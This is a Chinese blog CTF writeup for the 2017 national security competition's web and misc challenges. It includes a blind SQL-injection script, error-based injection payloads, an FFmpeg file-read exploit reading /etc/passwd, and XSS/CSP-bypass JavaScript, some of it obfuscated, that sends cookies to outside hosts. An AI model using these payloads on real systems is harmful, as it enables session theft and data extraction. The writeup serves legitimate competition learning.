

LoRexxar's Blog | 信息技术分享

LoRexxar's Blog | 信息技术分享

第十届信息安全国赛 Web MISC writeup



第十届信息安全国赛 Web MISC writeup

ctf Blogs sqli

 2017/07/11   Share

• 
• 
• 
• 
• 

周末花了一整天的打国赛技能赛的线上赛，去年比赛没能进入线下，当时就是因为感觉选手之间py太严重，今年没想到又遇到了这样的问题，所幸的是，今年运气比较好，做出来的题目比较多，所以py没有太过影响到我们。

下面就奉上web和misc的writeup，就我个人看的话，题目虽然不够新颖，但质量已经算是中上了，所谓的抄袭不知道是不是我见识短浅，就我个人看来都是比较正常的思路，xss可能抄袭了一个sandbox吧，感觉对题目本身没有太大的影响。

web

php

挺有趣的一题，虽然过滤很多，但是php是世界上最好的语言，能做的事情还是有很多

列目录，可以找到flag文件

code=$f=[];$d=new DirectoryIterator("glob:///var/www/html/f*");var_dump($d);

然后show_source可以读文件

<?php
$flag="flag{php_mail_ld_preload}";
?>

wanna to see your hat?

不太喜欢的一题，通过把语句加在html的前面，让浏览器没办法解析直接看到，无聊的设计。

抓包能看到语句

select count(*) from t_info where username = '123' or nickname = '123'

简单的试了下 单引号被替换成了反斜杠，想到这样的话可以与 nickname 处的第一个引号闭合，构造一个永真语句就好了

name=or(1=1)%23'&submit=check

select count(*) from t_info where username = 'or(1=1)#\' or nickname = 'or(1=1)#\'good job

flag vending machine

有一个迷惑的id，但是实际上没有任何卵用，感觉是完全无脑case过去的，所以看看别的点。

注册ddog’，在购买东西的时候显示购买成功，但是没有成功扣款。

那应该是存在二次注入，那我可以通过注册账号，然后购买东西，看钱是否减少，来判断条件的真假，这样可以构造出一个二次盲注。

其中还有一点儿过滤，可以通过复写绕过，可以直接通过注册来看名字判断这个问题，加在脚本里。

# coding=utf-8

import requests
import random
import hashlib
import time
from random import Random

s = requests.Session()
# url = 'http://106.75.107.53:8888/'
# url = 'http://120.132.55.92:8888/'
url = 'http://120.132.20.183:8888/'
tables_count_num = 0


def get_tables(url):
	
	for i in xrange(50):
		payload = "ddog123' or ((SELECT COUNT(*) from information_schema.tables WHERE table_schema = DATABASE())="+str(i)+")#"

		if get_data(payload):
			print "[*] tables_number: "+str(i)
			tables_number = i
			break

	for j in range(0,tables_number):
		for i in xrange(50):
			payload = "ddog123' or ((SELECT length(table_name) from information_schema.tables WHERE table_schema = DATABASE() limit 1 offset "+str(j)+")="+str(i)+")#"

			if get_data(payload):
				print "[*] tables_length: "+str(i)
				tables_length = i
				break

		tables = ""
		
		for i in range(1,tables_length+1):
			for k in range(30,128):
				payload = "ddog123' or (SELECT ascii(mid(((SELECT table_name from information_schema.tables WHERE table_schema = DATABASE() limit 1 offset "+str(j)+"))from("+str(i)+")))="+str(k+1)+")#"

				# print payload
				if get_data(payload):
					tables += chr(k+1)
					print "[*] tables: "+tables
					break

		print "[*] tables: " + tables


def get_colums(url):

	for i in xrange(50):
		payload = "ddog1223' or ((SELECT COUNT(*) from information_schema.columns WHERE table_name = 'fff1ag')="+str(i)+")#"

		if get_data(payload):
			print "[*] column_number: "+str(i)
			column_number = i
			break

	# tables_number=3

	for j in range(0,column_number):
		for i in xrange(50):
			payload = "ddog1223' or ((SELECT length(column_name) from information_schema.columns WHERE table_name = 'fff1ag' limit 1 offset "+str(j)+")="+str(i)+")#"

			if get_data(payload):
				print "[*] column_length: "+str(i)
				column_length = i
				break

		column = ""
		
		for i in range(1,column_length+1):
			for k in range(30,128):
				payload = "ddog1223' or (SELECT ascii(mid(((SELECT column_name from information_schema.columns WHERE table_name = 'fff1ag' limit 1 offset "+str(j)+"))from("+str(i)+")))="+str(k+1)+")#"

				if get_data(payload):
					column += chr(k+1)
					print "[*] column: "+column
					break

		print "[*] column: " + column


def get_flag(url):

	for i in xrange(50):
			payload = "ddog12s3' or ((SELECT length(thisi5f14g) from fff1ag limit 1)="+str(i)+")#"

			if get_data(payload):
				print "[*] content_length: "+str(i)
				content_length = i
				break

	content = ""
	
	for i in range(1,content_length+1):
		for k in range(30,128):
			payload = "ddog123s' or (SELECT ascii(mid(((SELECT thisi5f14g from fff1ag limit 1))from("+str(i)+")))="+str(k+1)+")#"

			# print payload
			if get_data(payload):
				content += chr(k+1)
				print "[*] content: "+content
				break

	print "[*] content: " + content


def random_str(randomlength=8):
    str = ''
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    length = len(chars) - 1
    random = Random()
    for i in range(randomlength):
        str+=chars[random.randint(0, length)]
    return str


def get_data(payload):
	
	payload1 = random_str(4)+payload
	payload2 = payload1.replace("SELECT", "SELSELECTECT").replace("WHERE","WHEWHERERE").replace("on", "oonn")
	register(payload2)

	login(payload1)
	buy()

	return check()


def register(user):
	r_url = url+"register.php"
	data = {"user": user, "pass": "user"}
	r = s.post(r_url,data=data)

def login(user):
	l_url = url+"login.php"
	data = {"user": user, "pass": "user"}
	r = s.post(l_url,data=data)

def buy():
	b_url = url+"buy.php?id=1"
	r = s.get(b_url)
	return r.text

def check():
	c_url = url+"user.php"
	r = s.get(c_url)
	#停1s,压力有点儿大
	# time.sleep(1)
	if "1997667" in r.text:
		return True
	else:
		return False

get_flag(url)

服务器特别卡，所以有误差，多打了几次拼起来
	
# flagEbbb6b6ui1d_5q1_iz_3z}
# flag{bbb6b6ui1d_5q1_iz_3z}

方舟计划

本来觉得非常有意思的一题，可能是除了非预期，导致3个队伍直接做出来了，然后主办方偷偷改题了，搞得人很难受，我们先一步一步来。

首先注册的电话号码地方有注入，但是有过滤

语句大概是
insert into users (username,password,phone) values (‘123’ , ‘123’, ‘test’)

然后可以显错，所以可以注

username=test&phone=1%27and%20extractvalue%281%2C%20concat%280x5c%2C%28%20select%20%2a%20%2f%2a%2150000from%2a%2f%28select%20name%20%2f%2a%2150000from%2a%2f%20note.user%20where%20id%20%3D1%29x%29%29%29%29%23&password=1&repassword=1

用户名
fangzh0u

username=test&phone=1%27and%20extractvalue%281%2C%20concat%280x5c%2C%28%20select%20%2a%20%2f%2a%2150000from%2a%2f%28select%20password%20%2f%2a%2150000from%2a%2f%20note.user%20where%20name%3D%27ddog%27%29x%29%29%29%29%23&password=1&repassword=1

密码同理\L8qyd7Vk/BIUVSeBfGshSQ==

注出来的密码是乱码，很难受，所以看看表里还有没有别的东西。

发现一个config表
config里id，secrectkey
取到secrectkey BjDjgKE8CEk5hA9z9FDH7otvGntinomp

key = "BjDjgKE8CEk5hA9z9FDH7otvGntinomp"
a = AES.new(base64.b64decode(key))
a.decrypt(base64.b64decode(c))
'tencent123\x00\x00\x00\x00\x00\x00'

这下账号和密码都有了，那么就登陆上去看看，是一个上传avi的地方，过滤比较严格，传上去的视频会转md4,当时第一反应就是那个ffmpeg任意文件读取的漏洞。

翻了一些文章就赛宁这个最完整，seebug也有一篇360的分析，也可以看看。

http://blog.cyberpeace.cn/FFmpeg/

exp：
https://github.com/neex/ffmpeg-avi-m3u-xbin

开始读/etc/passwd被过滤了，稍微研究了一下，好像是只过滤了这个，我们甚至还可以读etc/hosts，那么我们通过跨目录来绕过判断。

python3 gen_xbin_avi.py file:///etc/init.d/../passwd 3.avi

找到了当前用户，猜测这里有flag

开始读这个目录没东西，突然有flag了

python3 gen_xbin_avi.py file:////home/s0m3b0dy/flag 3.avi    

flag{U8I6y5hRfmn5M0ViR8im6FAn0GmCb8rg}

guestbook

题目本身不太难，不过感觉很多人都对这个题有争议，我就多说几句吧。

题目主要有下面几个条件
聊天版，有CSP（允许unsafe-line），然后有一些sandbox，rname可以修改名字。

ps:这里本来想要详细一点儿，结果题关了…不能截图了

1、首先是sandbox

<script>
	//sandbox
	delete window.Function;
	delete window.eval;
	delete window.alert;
	delete window.XMLHttpRequest;
	delete window.Proxy;
	delete window.Image;
	delete window.postMessage;
</script>

应该是从0ctf那个题目复制过来的，但是我觉得很常见，没啥问题。

2、然后是CSP

Content-Security-Policy	
default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; font-src 'self' fonts.gstatic.com
; style-src 'self' 'unsafe-inline'; img-src 'self'

基本都是self

先说正解吧，正解思路比较清楚，既然unsafe-inline，那么我们先获取一个后台的请求再说，bypass csp的方式就那么几种，主要是meta和link两个，测试发现直接传入<link就会被替换为hacker。

那么我们可以通过unsafe-inline来构造一个link，那么就不会出现<link了

我在http://lorexxar.cn/2016/10/28/csp-then/中提到这种攻击方式。

var n0t = document.createElement("link");
n0t.setAttribute("rel", "prefetch");
n0t.setAttribute("href", "//ssssss.com/?" + document.cookie);
document.head.appendChild(n0t);

这里我们能收到请求，但是cookie里却没东西。这里有一个cookie的路径问题，一会儿也会提到，先简单说一下。

如果我们在同一个域的子目录下，我们能看到当前目录的cookie，还有根目录的cookie，通过document.cookie也能读到。

但我们却无法在根目录读取到子目录的cookie，同样也没办法跨目录读cookie，不知道的可以自己去尝试一下。

因为发现存在admin目录，所以怀疑cookie是在admin目录下。

这里的思路是通过iframe引入一个admin目录，然后读取admin目录cookie，返回回来。

脚本

var iframe = document.createElement("iframe");
iframe.src = "../admin/";
iframe.id = "frame";
document.body.appendChild(iframe);

iframe.onload = function (){
  	var c = document.getElementById('frame').contentWindow.document.cookie;

	var n0t = document.createElement("link");
	n0t.setAttribute("rel", "prefetch");
	n0t.setAttribute("href", "//xxx/?" + c);
	document.head.appendChild(n0t);
}

如果测试过这个payload的话，你会发现，出问题了，因为onload被过滤了，而setTimeout函数需要eval，而这个函数进了沙箱…

这里突然发现还有一个功能，改名。

最最关键的问题是，index.php这个页面没有sandbox，也就是上面的payload是成立的，因为我们可以通过解字符来eval执行，这样就能绕过各种判断。

那么我们只要在提交的地方构造一个自动提交的表单，就能自动修改姓名，然后跳到index.php，执行js

payload

<form id="re" action="../rename.php" method="POST">
<input name="nname" type="text" value="<script>eval(String.fromCharCode(118, 97, 114, 32, 105, 102, 114, 97, 109, 101, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 105, 102, 114, 97, 109, 101, 34, 41, 59, 10, 105, 102, 114, 97, 109, 101, 46, 115, 114, 99, 32, 61, 32, 34, 46, 47, 97, 100, 109, 105, 110, 47, 34, 59, 10, 105, 102, 114, 97, 109, 101, 46, 105, 100, 32, 61, 32, 34, 102, 114, 97, 109, 101, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 105, 102, 114, 97, 109, 101, 41, 59, 10, 10, 105, 102, 114, 97, 109, 101, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 40, 41, 123, 10, 32, 32, 9, 118, 97, 114, 32, 99, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 102, 114, 97, 109, 101, 39, 41, 46, 99, 111, 110, 116, 101, 110, 116, 87, 105, 110, 100, 111, 119, 46, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 10, 10, 9, 118, 97, 114, 32, 110, 48, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 108, 105, 110, 107, 34, 41, 59, 10, 9, 110, 48, 116, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 40, 34, 114, 101, 108, 34, 44, 32, 34, 112, 114, 101, 102, 101, 116, 99, 104, 34, 41, 59, 10, 9, 110, 48, 116, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 40, 34, 104, 114, 101, 102, 34, 44, 32, 34, 47, 47, 48, 120, 98, 46, 112, 119, 47, 63, 34, 32, 43, 32, 99, 41, 59, 10, 9, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 110, 48, 116, 41, 59, 10, 125))</script>"/>
<input type="submit" value="提交">
</form>
<script>document.getElementById('re').submit()</script>

这样就能拿到flag。

赛后在和别人聊天时候发现这题还有别的解法，bypass sandbox.

当我们发现sandbox中删除了很多我们需要用到的函数，但是又被删除了，我们可以通过iframe，引入一个子页面，然后把子页面的函数读回来，这样就能绕过sandbox，也就不需要那步改名了。（很厉害的想法）

bypass csp
听@math1as说，bot时候的浏览器版本低于57，导致CVE-2017-5033可用，然后就能直接执行js，csp完全没用了，题目关了，没能亲自测试一下。

MISC

好像很多人关心misc的wp

传感器1

差分曼彻斯特编码，改了去年的题

a = 0x3EAAAAA56A69AA55A95995A569AA95565556
b = 0x3EAAAAA56A69AA556A965A5999596AA95656
ba = bin(b)
print ba
ss = ""

for i in xrange(len(ba[2:])/2):
	
	a1 = ba[i*2:i*2+2]
	a2 = ba[i*2+2:i*2+4]
	# print 'a1:'+a1
	# print 'a2:'+a2
	
	if a2 !='10' and a2 !='01':
		continue
	if a1 !='10' and a1 !='01':
		ss+='1'
		continue

	if a1!=a2:
		ss+='1'
	else:
		ss+='0'

	# print ss

print ss
print len(ss)

ret = ''

# if '8893CA58' in ret:
print hex(int(ss,2)).upper()

#0X10024D8893CA584181L
#0X30024D8845ABF34119L

warmup

首页找了一张图，在明文攻击，这里有个小问题，最开始使用4.54跑的，跑了很久完全跑不出来，我还以为有啥问题，后来换了4.53，一下子就跑出来了。

这样拿到3张图，开始脑洞，后来突然想到信息隐藏里有个技术是盲水印攻击，有现成的脚本跑一下

https://github.com/chishaxie/BlindWaterMark

BadHacker##

流量分析
乱七八遭的，啥也有…
有几个提示

PRIVMSG #hacker :How can i decrpt them?
:Guest27!~hacker@218.29.102.122 PRIVMSG #hacker :	you need to get the flag i hide on this server.
:Guest27!~hacker@218.29.102.122 PRIVMSG #hacker :	I changed some lines of one of a file on this server,If you find which lines ,and sort them you will get the flag!
:Guest27!~hacker@218.29.102.122 PRIVMSG #hacker :emmmmmmm~~~
:Guest27!~hacker@218.29.102.122 PRIVMSG #hacker :	just calc the md5,and add the flag{}

有个irc的服务器，没办法直接连上去，先扫扫端口

─[lorexxar@icy] - [~/Documents] - [日 7月 09, 14:24]
└─[$] <> nmap -sT -Pn -p1-10000 202.5.20.47 

Starting Nmap 6.47 ( http://nmap.org ) at 2017-07-09 14:24 CST
Nmap scan report for 202.5.20.47
Host is up (0.16s latency).
Not shown: 9974 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
443/tcp  open     https
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
901/tcp  filtered samba-swat
1068/tcp filtered instl_bootc
2745/tcp filtered unknown
3127/tcp filtered unknown
3128/tcp filtered squid-http
3306/tcp filtered mysql
3333/tcp filtered dec-notes
4444/tcp filtered krb524
5554/tcp filtered sgi-esphttp
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6129/tcp filtered unknown
6176/tcp filtered unknown
6667/tcp filtered irc
8923/tcp open     unknown
8998/tcp filtered unknown
9996/tcp filtered unknown

打开8923是个站，404，显示了一个蜜汁域名信息，想到设置hosts打开，是个ichunqiu，没什么发现，那么扫目录

找到了mysql.bak

翻了翻啥都没有，很难受。

无意中发现换行崩了，脑洞一下，可能是换行有问题，研究了一下，发现有\r,\n,\r\n三种换行，如果nodpadd统计\r有7个，脑洞一下把行数连起来md5

get flag

原文作者：LoRexxar

原文链接：https://lorexxar.cn/2017/07/11/guosai2017/

发表日期：July 11th 2017, 2:14:01 am

更新日期：September 29th 2020, 2:11:23 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Some Vulnerability for FineCMS through 2017.7.11
• Previous Post
  WordPress WP Statistics authenticated xss Vulnerability(WP Statistics <=12.0.9)

Powered by Hexotheme Archer

京ICP备2021004652号-1

PV: :)

CATALOG

1. 1. web
   1. 1.1. php
   2. 1.2. wanna to see your hat?
   3. 1.3. flag vending machine
   4. 1.4. 方舟计划
   5. 1.5. guestbook
2. 2. MISC
   1. 2.1. 传感器1
   2. 2.2. warmup
   3. 2.3. BadHacker##

• Archive
• Tag
• Cate

Total : 206

2024

• 06/11 PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577）分析与复现

2023

• 12/18 人与代码的桥梁-聊聊SAST
• 11/21 Joern In RealWorld (3) - 致远OA A8 SSRF2RCE
• 10/26 Joern In RealWorld (2) - Jumpserver随机数种子泄露导致账户劫持漏洞（CVE-2023-42820）
• 10/20 深入浅出Joern（四）不常用语法大全
• 08/31 Joern In RealWorld (1) - Acutators + CVE-2022-21724
• 08/24 深入浅出Joern（三）Joern和Neo4j常用语法大全
• 08/22 深入浅出Joern（二）CPG与图数据库
• 08/21 深入浅出Joern（一）Joern与CPG是什么？
• 07/19 打造自己的AIGC应用（一）入门篇
• 06/21 赛博偶像速成指南（三）- Midjourney
• 06/02 赛博偶像速成指南（二）- SD进阶篇
• 05/25 从0到1的ChatGPT - 进阶篇（五）- Embeddings
• 05/19 从0到1的ChatGPT - 进阶篇（四）- 训练自己的ChatGPT
• 05/08 看上去不起眼的微信机器人以及公众号爬虫
• 04/28 从0到1的ChatGPT - 进阶篇（三）- ChatGPT+？
• 04/26 从0到1的ChatGPT - 入门篇（二） - 如何与ChatGPT对话？
• 04/14 从0到1的ChatGPT - 入门篇
• 02/21 赛博偶像速成指南

2022

• 11/02 CS Xss2Rce CVE-2022-39197分析与复现
• 04/14 SCA的困境和出路
• 03/21 人生的第二个可能~

2021

• 12/10 log4j2 JNDI注入漏洞速通~
• 08/17 从0开始入门Chrome Ext安全（三） -- 你所未知的角落 - Chrome Ext安全
• 08/17 DevSecOps 究竟需要怎样的白盒？
• 08/06 区块链安全罪与罚 -- 浅谈区块链与安全发展史
• 05/19 创宇四年
• 04/16 反制Webdriver - 从Bot到RCE进发
• 03/09 通达OA代码审计篇二 - 11.8 后台Getshell
• 03/03 通达OA代码审计篇 - 11.7 有条件的任意命令执行
• 02/05 如何自动化挖掘php反序列化链 - phpunserializechain诞生记
• 01/28 为被动扫描器量身打造一款爬虫-LSpider

2020

• 10/30 构造一个CodeDB来探索全新的白盒静态扫描方案
• 09/21 从0开始聊聊自动化静态代码审计工具
• 07/14 Geekpwn 2020云端挑战赛 Noxss & umsg
• 07/08 从反序列化到类型混淆漏洞 -- 记一次ecshop实例利用
• 06/10 Roundcube mail 3 Xss
• 05/29 Roundcube mail代码审计笔记
• 05/11 空指针-Base on windows Writeup -- 最新版DZ3.4实战渗透
• 02/03 从0开始入门Chrome Ext安全（番外篇） -- Zoomeye Tools
• 01/14 CSS-T | Mysql Client 任意文件读取攻击链拓展

2019

• 12/30 pwnhub 被污染的Jade
• 12/05 从0开始入门Chrome Ext安全（二） -- 安全的Chrome Ext
• 11/22 从0开始入门Chrome Ext安全（一） -- 了解一个Chrome Ext
• 10/25 PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
• 09/23 从零开始学java web - struts2 RCE分析
• 07/23 CVE-2019-11229详细分析 --git config可控-RCE
• 07/10 Redis 基于主从复制的RCE利用方式
• 06/12 Mybb 18.20 From Stored XSS to RCE 分析
• 05/28 MIMIC Defense CTF 2019 final writeup
• 04/19 Drupal 1-click to RCE分析
• 03/14 聊聊WordPress 5.1.1 CSRF to RCE漏洞
• 02/22 Wordpress 5.0 RCE详细分析

2018

• 12/07 Discuz x3.4前台SSRF分析
• 12/07 Code Breaking挑战赛 Writeup
• 12/01 以太坊智能合约审计CheckList
• 11/20 LCTF2018 ggbank 薅羊毛实战
• 11/16 从DVP GAME到变量覆盖问题
• 11/14 HCTF2018部分Web题目Writeup
• 11/12 HCTF2018智能合约两则Writeup
• 11/08 “以太坊智能合约编码隐患”影响分析报告
• 10/18 智能合约游戏之殇——Dice2win安全分析
• 09/25 “以太坊智能合约编码设计问题”影响分析报告
• 09/14 blockwell.ai 虚假转账 事件分析
• 09/06 “以太坊智能合约编码安全问题”影响分析报告
• 08/24 智能合约游戏之殇-类Fomo3D攻击分析
• 08/22 “以太坊智能合约设计缺陷问题”影响分析报告
• 08/14 “以太坊智能合约规范问题”影响分析报告
• 07/13 wctf2018 cyber mimic defence Writeup
• 05/31 0CTF/TCTF2018 Final Web Writeup
• 05/23 RCTF2018 Web Writeup
• 04/20 基于Service Worker 的XSS攻击面拓展
• 04/17 TCTF/0CTF2018 h4x0rs.space Writeup
• 04/10 TCTF/0CTF2018 h4xors.club2 Writeup
• 04/05 TCTF/0CTF2018 部分Web Writeup
• 04/05 TCTF/0CTF2018 XSS bl0g Writeup
• 03/26 强网杯2018 Web writeup
• 02/23 吐槽HCTF2017
• 02/07 从补丁到漏洞分析 --记一次joomla漏洞应急
• 01/19 DeDeCMS v5.7 密码修改漏洞分析
• 01/02 34c3 Web部分Writeup

2017

• 12/19 WordPress Updraftplus 插件漏洞2则以及一些有趣的故事
• 11/15 HCTF2017-Deserted place-Writeup
• 11/15 HCTF2017 babycrack Writeup
• 11/15 HCTF2017-A World Restored-Writeup
• 11/10 HITCON2017-writeup整理
• 10/26 typecho前台getshell漏洞分析
• 10/25 前端防御从入门到弃坑--CSP变迁
• 10/25 WordPress安全架构分析
• 09/30 Discuz!X 3.4 任意文件删除漏洞分析
• 08/31 阿里先知xss挑战赛 Writeup
• 08/31 Discuz_X authkey安全性漏洞分析
• 08/23 从瑞士军刀到变形金刚--XSS攻击面拓展
• 08/15 pwnhub 改行做前端
• 07/26 finecms分析
• 07/23 xssgame writeup
• 07/20 FineCMS multi vulnerablity before v5.0.9
• 07/11 Some Vulnerability for FineCMS through 2017.7.11
• 07/11 第十届信息安全国赛 Web MISC writeup
• 07/07 WordPress WP Statistics authenticated xss Vulnerability(WP Statistics <=12.0.9)
• 06/16 0ctf2017 final
• 05/23 RCTF2017 web writeup
• 05/16 通过浏览器缓存来bypass CSP script nonce
• 05/12 PlaidCTF 2017 web writeup
• 05/12 xss bot从入门到弃坑
• 05/09 CSP Is Dead, Long Live CSP! 翻译
• 04/24 pwnhub 绝对防御 出题思路和反思
• 04/21 Shadow Brokers大新闻整理
• 04/21 360春秋杯2017 writeup
• 04/18 bctf2017 web部分wp
• 03/27 pwnhub 之小m的复仇
• 03/21 0ctf201 web部分writeup
• 03/13 NJCTF Web部分writeup
• 03/05 pwnhub_another php web部分
• 02/27 zctf2017 writeup
• 02/20 pwnhub 打开电脑
• 02/16 有趣的cdn bypass CSP
• 01/26 聊聊hctf2016
• 01/17 pwnhub 深入敌后
• 01/03 33c32016 writeup

2016

• 12/28 phpmailer RCE漏洞分析
• 12/26 pwnhub_迷
• 12/24 浅谈xss的后台守护问题
• 12/18 pwnhub_找朋友
• 12/18 pwnhub_拍卖行
• 12/10 pwnhub_WTF_writeup
• 12/07 using polyglot JPEGs bypass CSP 分析
• 12/03 通过redis getshell的一些小问题
• 12/01 hctf2016 简单部分WEB && misc writeup
• 11/30 hctf2016 guestbook&secret area writeup
• 11/29 HCTF2016 ATField writeup
• 11/19 hctf2016 giligili writeup
• 10/31 CSP进阶-302 Bypass CSP
• 10/28 CSP进阶-link Bypass unsafe line
• 10/26 什么是ctf呢？
• 10/11 hitcon2016 misc writeup
• 10/10 hitcon2016 web writeup
• 10/03 L-ctf2016 Writeup
• 09/14 php 伪协议
• 09/11 华山杯2016_writeup
• 08/29 crypto 简单的RSA
• 08/18 sqlmap 源码分析（四）开始注入
• 08/16 sqlmap 源码分析（三）在注入之前
• 08/11 sqlmap 源码分析（二）初始化
• 08/09 sqlmap 源码分析（一）开始、参数解析
• 08/08 CSP Level 3浅析&简单的bypass
• 08/07 python virtualenv沙盒命令
• 08/01 XNUCA2016 Writeup
• 07/21 python tqdm模块分析
• 07/18 shell上一些有趣的命令
• 07/17 sangebaimao之火币网
• 07/12 信息安全国赛技能赛 Writeup
• 06/26 一个有趣的东西-cloudeye
• 06/17 sangebaimao之招聘又开始了，你怕了吗？
• 06/06 alictf2016_web_writeup
• 06/04 sangebaimao 寻找来自星星的你一
• 05/27 在php opcache检测隐藏的后门程序
• 05/12 php webshell 各种函数
• 05/10 Asis2016_Binary Cloud
• 05/09 sctf2016_writeup
• 05/05 dockerfile (・ω・)ノ
• 05/04 docker 基础操作
• 05/02 google_ctf2016_writeup
• 04/25 CCTF2016_writeup
• 04/20 gif bypass CSP?
• 04/11 j123jt的聊天板大型wp
• 04/11 sctfq1_Obfusion_writeup
• 04/08 input属性bypass csp
• 04/06 hctfgame_ll的流量分析题
• 04/04 is_numeric和trim导致的判断绕过
• 03/30 web_for_pentest_II writeup
• 03/22 bctf2016
• 03/14 hctf_game_week4+5_writeup
• 03/14 0ctf2016 && sunshinectf2016 writeup
• 03/07 bkp2016_writeup
• 03/05 hexo转移到coding配置
• 03/01 ssctf2015_writeup
• 02/29 hctf_game_week3_writeup
• 02/28 ldpa简单注入
• 02/28 titan souls 普通模式通关攻略
• 02/18 简单的git教程
• 02/18 hctf_game_week2_writeup
• 02/18 hctf_game_week1_writeup
• 02/18 hctf_game_week0_writeup

2015

• 12/21 《代码审计》一点儿笔记
• 12/19 hctf2015的一点儿记录
• 11/19 xss link&svg黑魔法
• 11/19 SQL 显错注入
• 11/17 ISG2015_writeup
• 11/17 RCTF2015_writeup
• 11/02 SPWC & 华山杯？ writeup
• 10/24 关于sqli注入的特殊函数
• 10/04 XDCTF2015-writeup
• 09/28 Nsctf2015_Writeup
• 07/02 xss无声挑战赛_writeup
• 06/11 ctf近期总结
• 05/22 Windows Hexo博客安装配置优化（小白篇）
• 05/21 Hduisa_ctf_wee4_fucksql
• 05/10 Web for pentester_writeup
• 02/26 Hduisa_ctf_writeup01
• 02/26 Hduisa_ctf_writeup02
• 02/26 （转）十年学会程序设计
• 01/22 0基础如何学好WEB（转）

2014

• 12/31 凤凰挽歌，黑客独白（作者：我是老鹰&炫凤舞）
• 12/29 （转）学长们给我们的书目（结尾附上PDF地址）
• 12/29 菜鸟小白的开始...

 ctf  Blogs  sqli  CSP  xss  postMessage  java  csp  ssrf  redis  opcache  nodejs  race  pdflatex  csrf  Hexo  cve  Shadow Brokers  0day  windows  aigc  php  c  curl  eth  blockchain  Reprint  bookshelf  chatgpt  llm  embeddings  chrome_ext  chrome  chrome ext  webdriver  dns  cloudeye  crypto  RSA  rabins  cmd  shell  linux  node  cs  CVE-2022-39197  contract  mysql  dedecms  逻辑漏洞  phpmailer  midjourney  智能合约  aicg  sd  devsecops  whitebox  book_notes  docker  ctf web  phar  rce  dvp  漏洞分析  git  反序列化漏洞  类型混淆漏洞  ecshop  dz  Fomo3D  access  伪协议  Essay  hctf  misc  php opcache  eassy  checklist  jsre  clrf  struts2  sast  joern  cpg  oa  neo4j  白盒  injection  随笔  django  LSpider  爬虫  mimic  log4j2  jndi  pwnhub  flask  格式化字符串  模板注入  js  weblogic  lfi  wget  pwn  LFI  win server信息收集  msf  lcx端口转发  IPC通道入侵  fastcgi  ssh_sock5  python  tqdm  virtualenv  open_basedir  crontab  sangebaimao  php伪协议  file_put_contents  参数污染  CBC  LD_PRELOAD  sca  roundcube  gopher  fcgi  Essry  sqlmap  game  titan_souls  tongda  blog  wechat  SAST  tools  静态分析  wordpress  代码审计  条件竞争



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

 Blogs  Reprint

